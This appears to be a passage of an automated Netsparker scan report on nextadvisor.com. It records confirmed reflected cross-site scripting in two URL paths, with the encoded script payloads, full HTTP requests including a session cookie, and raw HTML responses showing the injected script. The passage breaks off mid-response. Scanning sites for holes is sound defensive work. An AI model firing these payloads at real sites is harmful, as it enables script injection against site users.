href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogca..
- /audiobooks/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000178)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000178)%3C/script%3E

/audiobooks/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000178)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000178)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/audiobooks/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetspar..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000178)</script>

Request

GET /audiobooks/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000178)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/audiobooks/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:56:30 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6604
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", audiobooks, audio books, books on tape, books on CD, book downloads, audiobook downloads, mp3 books, Audible, Booksfree, eMusic Audiobooks, Simply Audiobooks, iTunes, Barnes & Noble" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/audiobooks/index.php'"--></style></script><script>netsparker(0x000178)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000178)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/audiobooks_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Audiobook Downloads and Rentals FAQ</h1> <p>Frequently Asked Questions about Audiobook Downloads and Rentals</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Audiobook Downloads and Rentals:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="audiobooks"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-..
- /auto_insurance/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000198)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000198)%3C/script%3E

/auto_insurance/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000198)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000198)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/auto_insurance/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000198)</script>

Request

GET /auto_insurance/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000198)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/auto_insurance/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:56:40 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6660
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", , Geico, 21st Century, Progressive, Esurance, Hartford AARP, Allstate, The Hartford" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/auto_insurance/'"--></style></script><script>netsparker(0x000198)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000198)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/auto_insurance_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Auto Insurance FAQ</h1> <p>Frequently Asked Questions about Auto Insurance</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Auto Insurance:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="auto_insurance"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog2010033